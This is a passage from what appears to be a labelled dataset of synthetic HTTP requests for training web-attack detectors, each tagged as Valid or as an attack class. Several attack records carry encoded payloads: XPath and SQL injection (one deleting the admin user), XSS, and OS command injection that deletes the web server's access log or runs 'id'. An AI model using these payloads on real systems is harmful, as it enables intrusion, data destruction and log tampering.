Authorization: Digest username="Ps5he"
Range: 6035-,928-
Referer: /rlmnzoi.mspx
TE: trailers,trailers
Trailer: Accept
User-Agent: uyie5oza (edwyz@hD2R; 8kG_7g; 3l2hzEz0-; iD-axvy1iI)
UA-CPU: StrongARM
UA-Disp: 3544,5975,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8463x313
Via: diwe/6.7 225.6.28.207
Transfer-Encoding: compress
Upgrade: egtiin/0.3
Warning: 596 232.43.0.142 "o7nreoNhqvei" 
X-Forwarded-For: 182.69.80.158
X-Serial-Number: 24080640322850948511
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14377
Start - Id: 48999
class: XPathInjection
GET /veplet6.png?tsArotrani=xtermobjectk&mirodlt=etAia%27++++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++%27gtpegia%27+++%3D%27 HTTP/1.0
Host: www.OtIcu2v.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.0
Accept-Language: *
Cache-Control: min-fresh=62200
Client-ip: 227.105.165.38
Cookie: s1elcsr=4
Cookie2: $Version="6"
Date: Mon, 29 Mar 10 20:31:27 GMT
ETag: W/"-.OXjC_5aOfFkoC9vZ07"
Expect: 100-continue
From: yriAeeon@iwtteeent.st
If-Modified-Since: Sat, 11 Aug 07 17:48:17 GMT
If-Unmodified-Since: Sun, 10 Sep 06 18:47:43 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 47
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: NTLM bmU2b2lzeXM3QXR0ZHkzaWxmbnUyM09hcmlvYW43dElubmRJcnA=
Range: 468-8399
Referer: /3oahi4y6/ieBaa7at.jpeg
TE: deflate;q=0.9
Trailer: Range
User-Agent: Mozilla/4.0 (X11; U; Solaris 5.0; ah-9d; rv:2.1.4) Gecko/53870085
UA-CPU: 68000
UA-Disp: 5081,8437,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 146x384
Via: HTTP/2.4 www.eBblsOit.html:0
Transfer-Encoding: gzip
Upgrade: ooldn/4.6, Lt8g/4.6, eeaos/4.4, en1qst/7.3, omia/8.0
Warning: 893 www.orci.jpg "9g1en4itrrimothb4" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48999
Start - Id: 3221
class: Valid
GET /Elrentyfooint/asvsrtlsntadtwho/ieoa.asp?DIsd7OV0m3=ixs6eaittara&e6Ea0ymtrli=17&yaDPY83access_log.@=2iOjhaeg&tmpoJdropmEZj=hpsso6tigi&soec5newriethm4=et&wCjdOSvreplace4V=5alikeaLgkc HTTP/1.1
Host: 200.135.99.90
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: big5
Accept-Encoding: 
Accept-Language: nsnhaoto-s, 26hRkf-enTm, red-avoe, Hmeia-sa;q=0.2, ije3r-o
Cache-Control: only-if-cached
Client-ip: 229.115.192.49
Cookie: drdINojeK=375297
Cookie2: $Version="96"
Date: Sat, 05 Jan 08 20:21:10 CET
ETag: W/"hlNmoCFNayhu@tj_jjPq"
Expect: 100-continue
From: ee5cc9@atzl3njm.com
If-Modified-Since: Tue, 01 May 07 07:46:56 CET
If-Unmodified-Since: Sun, 07 Mar 04 03:19:18 UTC
If-Match: *
If-None-Match: "HYGIs3IYFAjUpAvbM-"
If-Range: "iyL1L64nAoAwwhoVClAf"
Max-Forwards: 279
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM amlhbnBCSGc3YWFuQWVlYUhlYW82aHV0dTQyY2ZvcmhFZWVkaA==
Authorization: Basic bDN0c3RhYXc6dGFlbmF0cnM=
Range: 82-228963,737536-47
Referer: /w0un/aogti.swf
TE: chunked,trailers,gzip
Trailer: TE
User-Agent: cvoenN/0.5
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 357x7403
Via: FTP/5.0 www.1atgrNp.shtml, 8.9 250.45.86.95
Transfer-Encoding: gzip
Upgrade: ircioc/5.5, hzedyy/5.6, wArsli/6.7, Euo/8.2
Warning: 768 www.smdc5B.jpg:09194 "irt4rsn3aoytisotr5l" "Mon, 24 May 04 05:31:39 GMT"
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3221
Start - Id: 49440
class: XPathInjection
GET /7htEhbnttsipr0aeej/fdlhmnIsuwess3/osagnr7tltrJAiesru.pl?dropsUschildGH=%2Bk&aktieSznhlbr=mhieeehitlfNtEpny&rrgoh=gemsah%27+++or++u3ajm%2Fntady%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D10%5D+++++or++++%27sTuh%27+++%3D%27&en=5%26echoroa++t&dhl=74660&o2yvnstpaas3=olocationnt&EtInNtSt=oeei2&hCnsykI5lrttet=to&tenyesgpt=iqelenmdlfi HTTP/1.1
Host: 223.199.187.187:9
Connection: i9aen
Accept: image/jpeg;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 111.175.169.32
Cookie: eTsRjyOD=Mpassthruhk;amciJn=iEacod coa3xnq 
Cookie2: $Version="59"
Date: Tue, 12 May 09 17:29:58 CET
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: ahceh5y=Ebeurdoc;a1t9sftt
From: n5thibdN@srSdAet.st
If-Modified-Since: Fri, 09 Feb 07 14:23:27 GMT
If-Unmodified-Since: Wed, 13 Oct 04 10:46:39 GMT
If-Match: *
If-None-Match: "UW_u@HH5e@YUSHFS"
If-Range: Tue, 12 Apr 05 10:44:51 UTC
Max-Forwards: 8
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nc=3d94f4fE
Authorization: ei93ee ontr=ia8Itr1b
Range: 60-32,32547-,55039-
Referer: /im1nl/eehei.bin
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/9.4 (X11; U; Solaris 2.5; ed-zi; rv:2.7.7) Gecko/30684514
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: 6.1 www.tBeai.jpg:22, 1.5 251.35.209.184
Transfer-Encoding: deflate
Upgrade: e0oOd/9.2, ouh2i/3.3, Ncur/2.5
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49440
Start - Id: 41744
class: SqlInjection
GET /cDOn.u.5rfL/nwmNIvt/sZlMpSRp9g/uoeusta5eh/a4nnlthbatreth5rh/xuaEeaemi/taeheiUzSqeesi/Fc0Osrtrerta/rDtqaQXrMMMqhBXlKi5.css?yodaqecnMo=5646&adlr=rEerbetweentprl&t1d3Trxd0el=b2s5pessewacsa&doeSeDhbupd=hcwl&ZrmvodTELjDSE=189625&mlDmora=h%3Csc&9TSvSe=loehnaX&ennnPbEnesir=94312&tSpmu=tdd%7E&4Sss6da=asWJB&eio=iOfpJCGEM8&ec=0eiyrhc%27+++%29%3BDELETEFROMusersWHEREupper%28username%29+++%3Dupper%28+%27admin&Hsbybrwp=rshutdowny&ehmie1thmuoo=txZ&7jservicesoleJ=qns HTTP/1.0
Host: 133.197.38.43:0587
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=469
Client-ip: 136.31.14.94
Cookie: bea=15
Cookie2: $Version="2"
Date: Wed, 19 May 04 08:21:41 CET
ETag: "UVxosaB2xCH2mpUKt0jR"
Expect: ih2Wcxj
From: AEeu@io5oeTS.be
If-Modified-Since: Thu, 23 Jun 05 17:50:39 CET
If-Unmodified-Since: Mon, 10 Nov 08 10:36:46 CET
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: "Qb3J5Ez19jpJNWFv2K"
If-Range: Thu, 21 Jul 05 08:40:36 UTC
Max-Forwards: 90
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic NGlzZW9yOmF5b2k=
Range: -69404,-1
Referer: http://www.n7seoI.net/tqltn7l/l2uqrNs/reimGe/nts4yobn.gif
TE: trailers
Trailer: TE
User-Agent: Mozilla/8.2 (Machintosh; U; Mac OS X 8.9; h7-pt; rv:6.6.5) Gecko/65882421
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8130x9539
Via: truans/0.5 www.aedhm.gif, 8.8 www.WafeAin.html:76873, HTTP/7.6 5.8.6.135
Transfer-Encoding: compress
Upgrade: mer/2.9, hitWop/2.4, vtjw/1.7, otte/3.2
Warning: 878 www.6sn3l.shtml "noyalXfnbpe" "Wed, 14 Sep 05 14:01:16 CET"
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41744
Start - Id: 7769
class: Valid
PUT /8LzGcU.908iFsBn/ojsV/ulj/earquc@_dLQeKsCu1N2/4Nkr1bjg31/vbscriptE/msia2je6g8dihdr/aLsc/h3fdpjibyTqHwO.pl? HTTP/1.1
Content-Length: 254
Content-Language: essolid
Content-Encoding: identity
Content-Location: http://www.fiRehb0f.com/2Sore/0hun.jpg
Content-MD5: eWFhbmlnaWU1YzZ0ZW5pYg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 11 Feb 09 08:10:22 GMT
Last-Modified: Mon, 27 Aug 07 23:53:09 CET
Host: 29.119.124.20
Connection: laE7mhh
Accept: */*
Accept-Charset: macintosh, hz-gb-2312;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 200.184.5.24
Cookie: 8RoSs7ur1o=wyDLmifHNsZ4;_o3NP=rge
Cookie2: $Version="1"
Date: Tue, 06 Feb 07 22:55:46 UTC
ETag: W/"8RQB1Qe.P@oXtZte.vHq"
Expect: 100-continue
From: aueghrP@epx9atfOth.fr
If-Modified-Since: Mon, 09 Nov 09 08:01:20 UTC
If-Unmodified-Since: Tue, 19 Feb 08 20:43:08 CET
If-Match: "TGeEWNFZFrLg0ItEU"
If-None-Match: *
If-Range: "xhEUtX.XuuaAuaLtK4"
Max-Forwards: 4899
MIME-Version: 2.6
Pragma: 8urdLcee='erq5lee'
Proxy-Authorization: eote tt3r=ttotib1
Authorization: Basic dHNoamU6cHJzYw==
Range: 22-
Referer: http://etiio.fr/tErthnhs/aeeyemu/acjrEcx.swf
TE: chunked;q=0.4,chunked;q=0.7,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.5 (Windows; U; Windows NT 6.9; ir-ae; rv:3.8.9) Gecko/04184063
UA-CPU: StrongARM
UA-Disp: 6054,768,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 782x104
Via: 6.0 www.ishg6ug.htm, syaa/1.3 212.1.239.20
Transfer-Encoding: gzip
Upgrade: hen/2.3, tkocy/8.4, cNad/2.7, rStxee/8.1
Warning: 810 141.222.234.142 "zmnweaewonEakBetbj" "Sat, 23 Jan 10 20:21:52 CET"
X-Forwarded-For: 246.243.72.110
X-Serial-Number: 575735447
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bii=86958478&qOm6cmtn=y4d$i&0nl8=l6eio&g9oktodoatea=24420&1Yqhavingv1K=m3nr7QX-X&ue=n\lssnngn/u%ut&hh=imgwishutdown1bwinntte&aocnTeei3hji=iRrh&oytcOatemqn=[locationqm$o[&9AoqmsaL=4469442767&aeRTil=27688498&anahe=/h%2dfw)z8e8eahtpassts

End - Id: 7769
Start - Id: 26813
class: Valid
GET /heriplcaos5esw/oEisEdeso/xoS/d_qZcpbinZLdechobin/sbAtoezdx7/FSUCh/sFf5ON.UEBlS_M/tlN18jo/TF_K.tiff? HTTP/1.1
Host: www.lpg3.biz
Connection: close
Accept: application/x-tar
Accept-Charset: iso-8859-15;q=0.7, windows-1255
Accept-Encoding: deflate;q=0.0, compress, identity;q=0.7
Accept-Language: ab-elmoous, om5-httt0Mor;q=0.2
Cache-Control: max-stale=9270
Client-ip: 176.108.132.189
Cookie: gseeefi=nQkw0r;fS=870752562;atnz=lismyv5\n
Cookie2: $Version="65"
Date: Mon, 19 Mar 07 21:00:46 CET
ETag: W/"1qXeixpCkvzJassQ"
Expect: cltu=tmss;uuan6=qlkaTsd
From: 4ahee@onawd.st
If-Modified-Since: Thu, 26 May 05 09:11:02 GMT
If-Unmodified-Since: Tue, 24 Aug 04 15:50:11 UTC
If-Match: "-5uF7o.RecTuYFUNEQ1z"
If-None-Match: "ypwFR-nV5XLRGmQG"
If-Range: Wed, 09 Jan 08 05:48:28 GMT
Max-Forwards: 1
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 65405-,6-
Referer: /rXssjn.ace
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/3.3 (X11; U; Open BSD i586 6.9; s0-vu; rv:2.9.6) Gecko/70100492
UA-CPU: StrongARM
UA-Disp: 8290,106,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8583x639
Via: ttrtw/0.5 www.sdramn3.jpeg, 1.6 www.svgm.jpeg:3, 3.2 www.hrl6nd.js
Transfer-Encoding: deflate
Upgrade: opiEo/2.6, i3n5Ve/7.1
Warning: 389 52.49.112.134 "oteheTaa8etaepq0e" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 51104
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 26813
Start - Id: 12990
class: Valid
GET /nHLO2fzTSjOoBe7/mQjFRk/9HhNsP6uoIrYZk9--m6s/ksnoran/aA6yqA-OUKB1M3mI/aeeE3bemaEaFo5le/oZg8-TeAJmDzmy2V2/1zq3B@nEh1KVmW1/YpXdJMNLddYz/ptcedo36te.mspx?hn2nn0=768 HTTP/1.0
Host: 74.30.71.60:3443
Connection: 0Wr0eh
Accept: application/zip;q=0.2, audio/*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: compress, gzip;q=0.3, identity, deflate, compress
Accept-Language: *
Cache-Control: c2irD='iec'
Client-ip: 36.28.31.243
Cookie: gactb5ierhai3=rimcopybodydiEe1N;th8tlhoOriixgi=D2n;slc0geofEh8=4~;
Cookie2: $Version="3"
Date: Sat, 24 Oct 09 23:11:19 GMT
ETag: W/"@dtr3ZETT_u3A8ZN_"
Expect: iltbdt
From: picsvpm@izhyigm.biz
If-Modified-Since: Sun, 11 Oct 09 01:30:00 GMT
If-Unmodified-Since: Sat, 19 Aug 06 11:55:11 GMT
If-Match: "NJqXSc-8j1yVa@-f"
If-None-Match: "oRrungw30jF8yAkQu"
If-Range: "V0PUzwentEKNeP5Cf3vc"
Max-Forwards: 74
MIME-Version: 8.0
Pragma: sZlfH2t='sE'
Proxy-Authorization: Basic cjdHaGVsOm9zZW5tbklv
Authorization: rp7j 0nfsa=audw
Range: 459-
Referer: /eefeEw/ystiaoTd.txt
TE: gzip,deflate
Trailer: Range
User-Agent: twWH6tNeS http://www.rwcoH.st
UA-CPU: MIPS
UA-Disp: 8913,250,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 011x9947
Via: 5.6 127.223.120.2, 3.1 224.202.54.208, 5.0 www.eunTh.js
Transfer-Encoding: gzip
Upgrade: eir/2.5, te5s/6.4
Warning: 479 www.eorrw.html "seteahmS" 
X-Forwarded-For: 234.188.207.127
X-Serial-Number: 48761623
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12990
Start - Id: 24562
class: Valid
GET /ofshLe6eRhoeamEac/y3m8lHgHLynUj6EZ3u@t/dt/dufo2hAS9Bsrg/aGiTeg5j00FhjM/5D9OHn/lcnUV2b36j_UGVM.ibf/6mkt5l18e4to/GorAlmetanX-mySyAm.tiff?jndd3daem=95668&gi1id0OyI=0650 HTTP/1.0
Host: www.2aub.de:80
Connection: close
Accept: application/postscript;q=0.6, application/zip;q=0.7, audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: identity, deflate;q=0.6, deflate;q=0.2, identity;q=0.7, compress
Accept-Language: *;q=0.6
Cache-Control: min-fresh=2
Client-ip: 194.37.152.82
Cookie: iran2mo6ioew1dK=ln;eeaeaeuep78wh=t6@k;aCeteugtdlb=5947;ocuanehiw=l ;na=Ttc
Cookie2: $Version="9"
Date: Thu, 21 Aug 08 04:58:32 GMT
ETag: W/"IGn6puN@YFKoOUM8WC"
Expect: 100-continue
From: eCraxq8@s81s.com
If-Modified-Since: Thu, 22 Nov 07 03:25:11 GMT
If-Unmodified-Since: Wed, 14 Jan 04 17:39:35 CET
If-Match: "HrU0Btd0kXDQWnlR3Ax"
If-None-Match: "VpH_saX18Ct6gAJM"
If-Range: Thu, 02 Jul 09 18:07:01 GMT
Max-Forwards: 10
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic dTdlbzppZXNySW8=
Authorization: Basic ZHRlZTppZXNsZQ==
Range: 4851-94
Referer: /gEbrsnX.jsp
TE: chunked,trailers
Trailer: Range
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 8.4; Id-ao; rv:3.3.1) Gecko/09113504
UA-CPU: StrongARM
UA-Disp: 6381,2438,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 049x0039
Via: 5.2 www.hsec.png:5, 3.9 145.25.184.178, 2.7 148.119.92.13
Transfer-Encoding: Eaop; igfEk=Edaj
Upgrade: tfDtgt/3.8, s7e/0.3
Warning: 626 www.dt4tel.gif "meir" "Tue, 26 Jul 05 08:33:29 GMT"
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 185732331097779
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 24562
Start - Id: 21701
class: Valid
GET /p22i/0DsM5mlor8E-/rl5g/lncFyY/roS/LduFiDt@QV/sxehqt8a3lo/tJ.5As4J0Ak1m7PJUX/ctmI/aCQHk1vW@F/o79FwmZajKEkW.shtml?khazaAfsn6tmmic=fqq5-8&rupetttos=dhetei HTTP/1.0
Host: 214.111.51.240:26
Connection: iw2e
Accept: text/xml;q=0.5, audio/basic, audio/*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, identity;q=0.1
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 19.23.184.246
Cookie: rca=bxUuneKMWN;u4RoasO2s4lwdo=943sztgwhryOimmneS;r7eeseotf=ttuej8sN:Ata6 Xhz;o2Wi09X=0;fnhYh5pusjrtgnd=0hlouytlug8acdeeXs;zmuaac3m=o-nop:aGbetweennten
Cookie2: $Version="9"
Date: Sun, 21 Jan 07 13:06:55 UTC
ETag: "sD5DT9hbkp6_Id0xi"
Expect: smsi8=6Iko
From: oteJo@zdjaie.biz
If-Modified-Since: Mon, 23 Aug 04 16:15:26 CET
If-Unmodified-Since: Mon, 25 Jan 10 02:25:40 CET
If-Match: *
If-None-Match: "w1xxQCR4fviwSlg9K7uM"
If-Range: "1-jTM7s88ulx.Nq4"
Max-Forwards: 1767
MIME-Version: 5.7
Pragma: s=szfsre7e
Proxy-Authorization: Basic cnZ6SHRobDphOHRvNnc=
Authorization: Basic bmxsb286bmd5cmRvbzg=
Range: -1,88-434741
Referer: http://www.reosA.de/grFrr/lewdlash/hs9tnnl/bzhtat.fgf
TE: gzip;q=0.5,chunked,chunked;q=0.8
Trailer: Via
User-Agent: 9bVLll http://www.Ueui.fr
UA-CPU: Sparc
UA-Disp: 299,773,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 664x378
Via: si0/4.3 www.iy1t.htm, 8.1 124.73.120.146
Transfer-Encoding: ri3l2j; cnih=otsrfte
Upgrade: Abae/9.2, 23ehie/8.6, esDl/9.5, y7tfvd/4.7, aiC/7.6
Warning: 456 16.111.210.179 "htasayeJyno" "Fri, 12 Nov 04 12:32:53 CET"
X-Forwarded-For: 36.156.86.13
X-Serial-Number: 878633505058638
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21701
Start - Id: 48072
class: XSS
GET /cSno3pnwh/3YEuZNvNmmd/mVsKhndykBATjt.q/3FN/iAbJVidsaminputLG3Gj/rsdoijeo0rtdj.js?Zliu=0&kDigyaeeys1MF=7379&dnYkdgfaturP=5774738&AiKJ=rhdeleteer&pteH3CaWoc=136&tfnxi36=Nae+style%3Dleft%3Aexpression%28alert++++%28e.qsx8%29%29&tIdEaaaqe1bEde=144699535&zkeehsn=r%5Cecmd&tbpasswd5tmp=9332896&hbisaeNr5bc=1&oweq9Vouisdtxsr=lehorr0aEmrobjecto HTTP/1.0
Host: 62.74.181.19
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: macintosh, iso-8859-6, cp-932, us-ascii;q=0.0, windows-1251
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 151.8.225.81
Cookie: ji5canbs=68987;jnes=os;n44sIet=yRZ
Cookie2: $Version="5"
Date: Sun, 22 Mar 09 09:24:27 CET
ETag: "R5BYw6j-JCKxG5F_i"
Expect: fuezA
From: sreEas@au8Ut4bn.gov
If-Modified-Since: Sat, 25 Apr 09 01:54:50 GMT
If-Unmodified-Since: Mon, 01 Nov 04 20:19:13 GMT
If-Match: *
If-None-Match: "Nvg0jxTzLr-Gcr9.lw"
If-Range: *
Max-Forwards: 5877
MIME-Version: 5.2
Pragma: SAa=f
Proxy-Authorization: Digest nonce
Authorization: nc4hh h2tOta=iy5a
Range: -1,041-88,-53
Referer: http://www.sInes.biz/mis6/tmiqsm/3uen/Al3sl.swf
TE: chunked;q=0.2,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.4 (compatible; heie; WinNT; ubau; etENAew)
UA-CPU: x86
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: 19g/1.8 www.ssheta.shtml, 5.5 27.199.70.159
Transfer-Encoding: nptae
Upgrade: 0eadh/9.5, oyzasn/0.3, ulmsi7/4.4, bdhaod/9.0, riJn/7.4
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 
X-Forwarded-For: 69.186.228.89
~~~~~: ~~~~~~~~~~

null

End - Id: 48072
Start - Id: 43122
class: OsCommanding
GET /eYTyzQ50nF/h1Vw/g.9htaccesKB1/iepde6e9rOicdd/x_BlogGpie8/ioeth9a1acrueo/pOGlnapC7oY9/nnOihK24brI3fk/blnhl6Rsll9b0rRnm/tdoN_/ljeoeto9m.msf?g6Icnhno=%250arm+++-f++%2Fvar%2Flog%2Fhttpd%2Faccess_log++++%3B&agy=e1rserwTxnhttpnywes&k-kiqn54=hjJ08DLm2j_l&u80Ss=t+kiop%3ARtg+8ieexp_lms&ehtopdnoab3E=eiau&ynel7bma=tmpk&snalstz=linput&im2epmew4ah=heAcinsert&tx9oc0deeery=garal&2Cvtmaf=6&g1z8Dwp-ncU6TI=w+ HTTP/1.1
Host: 136.245.157.100
Connection: close
Accept: video/mpeg, audio/x-wav
Accept-Charset: x-mac-icelandic;q=0.0, windows-1251;q=0.2, iso-8859-7;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 147.97.228.238
Cookie: vraaSg=yac;3s1Qtfrom_7=54849
Cookie2: $Version="25"
Date: Tue, 29 May 07 14:50:09 UTC
ETag: W/"w@Pxrazmm_UrCSsE"
Expect: spfinn
From: ydaj1@ewfas0rh.de
If-Modified-Since: Sat, 18 Aug 07 15:26:06 CET
If-Unmodified-Since: Tue, 27 Apr 10 10:53:09 CET
If-Match: "3dNO5YgDRuatuL8yL"
If-None-Match: "kdmInhjGX8@PH0Zx1S"
If-Range: *
Max-Forwards: 182
MIME-Version: 9.7
Pragma: rEce=pSs0t
Proxy-Authorization: Basic MTJzcm46cXN0Y25tdQ==
Authorization: Digest qop=auth-int
Range: 94856-,22-022
Referer: http://www.oyis.fr/toemnho.tar.gz
TE: gzip;q=0.9,trailers,trailers
Trailer: Host
User-Agent: Mozilla/2.5 (Windows; U; WinNT 7.1; rc-35; rv:0.8.0) Gecko/43569114
UA-CPU: Sparc
UA-Disp: 046,4473,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 603x2268
Via: 4.7 www.Tr5eywnt.jpeg
Transfer-Encoding: gzip
Upgrade: gst/8.6
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 231798615796568
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43122
Start - Id: 36797
class: OsCommanding
GET /hQ3dkCG.@i28/nxlY9V@QAzAHeDwF-r45/n56N8_wQH9.jpg?FHIzsJao5C=lSAN&eereamrsTeuyT=%7C+echo+++%22Content-Type%3A+text%2Fhtml%22++++%3B+++echo+++++%22%22+++++%3B+id++%5C0&etnr1dl=s1nd&dtqu=64129&tasa002sy=%24y HTTP/1.0
Host: 159.253.60.208
Connection: nAaAati
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 215.243.66.219
Cookie: Eofsanbzd=0>=h;9D0os=cBoSTui.F-dJ;nre7eqm=connectdo;1nT0AeseioriH=13197813
Cookie2: $Version="08"
Date: Fri, 20 Feb 04 12:24:14 GMT
ETag: W/"8334JjPUOIE_-tVFu"
Expect: sid9n=eluiuds;m3ishri=rjmr
From: wsCala@r0ragpmo.de
If-Modified-Since: Tue, 02 Sep 08 21:53:29 GMT
If-Unmodified-Since: Fri, 07 May 04 15:41:16 GMT
If-Match: *
If-None-Match: "Aif7YJnnT6Pe-lSeVYHD"
If-Range: "veBP4ERr77NlUMgYmQ"
Max-Forwards: 36
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: ul8wy wpHmreh=nsssH2
Authorization: Digest qop=auth
Range: -696,54746-
Referer: http://www.aPErI.it/chdmn.pdf
TE: trailers,trailers
Trailer: Upgrade
User-Agent: idTepoa/6.9.0
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: 3.2 www.eitw.htm, ess/9.1 www.syhgu.jpg, HTTP/0.1 www.emmjrti.css
Transfer-Encoding: hpn1s
Upgrade: wfs/7.4
Warning: 870 www.spydgb.jpg "hrhsaomoChmoogw" 
X-Forwarded-For: 37.3.209.174
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36797
Start - Id: 561
class: Valid
GET /egaccepttzElDcYxsystemxterm/doE1xyo39rb/lFHpassthrukBTQkiqexecJA/wAielfb0tschirto.jpeg? HTTP/1.0
Host: www.ts97nyden.cz
Connection: close
Accept: audio/basic, audio/basic
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: ehhenoid-eo;q=0.6, evmie-42otm, pio-waSsbean
Cache-Control: no-transform
Client-ip: 160.201.138.49
Cookie: 5b=vP/fo;lEltb=uMhioy;APdaOB726=ni s10aLo;nxye=aoa
Cookie2: $Version="404"
Date: Mon, 23 Jun 08 09:34:52 CET
ETag: W/"ln37JRy0Pdvd44lMwj2"
Expect: 8mlnolre=hrua
From: bss0NyZ@igoc.st
If-Modified-Since: Sat, 27 Nov 04 22:07:34 GMT
If-Unmodified-Since: Tue, 13 May 08 20:00:39 CET
If-Match: "7a4kg0jLevW-BR8"
If-None-Match: "vhuTkefGvi6kq1vhYPDA"
If-Range: Tue, 01 Apr 08 10:05:53 GMT
Max-Forwards: 837
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic N2dtVGFzOjh4cnRw
Authorization: Basic YXRoNjY6MHNyNw==
Range: 5753-
Referer: http://www.nmeel.uk/w8tnjeai/ur7lntd/eiAN5eme/caadltae/ssp1earu.msf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/6.0 (compatible; ersE; Mac OS X; 2tfwellant; iap8imco; jmaY)
UA-CPU: MIPS
UA-Disp: 4985,6312,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 484x3483
Via: 3.0 www.eYede.jpeg, 6.4 www.laonlm.html, 0.5 79.60.131.161
Transfer-Encoding: compress
Upgrade: 4s9hDc/2.6, irltj/9.0, tsqtnd/0.1
Warning: 107 www.ojbehoq.css "igabo" 
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 602347866565729
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 561
Start - Id: 11721
class: Valid
GET /eygI81AuVC0Lo.V/-@divlinkUPqi_Mwhere81rX/3wrtanu9yyectee0tr9/gMrAaxw/iGTVjzA.9X/cl15rtIa3rrU/elfiHxFsodapeh/msispx/fCS@hZI3K-.swf?ehohwpsegc5cnx=hat3rCaiiere4bveoa&htwoshrae63a=o6Dnn&prOwmreatss=dcE0S3&ljoerA92oliat0=437255259 HTTP/1.1
Host: 190.44.70.208:42657
Connection: dlh6n8o
Accept: */*
Accept-Charset: iso-8859-9;q=0.9, windows-1250;q=0.6, x-mac-roman, big5
Accept-Encoding: *
Accept-Language: vysrbybu-irdz
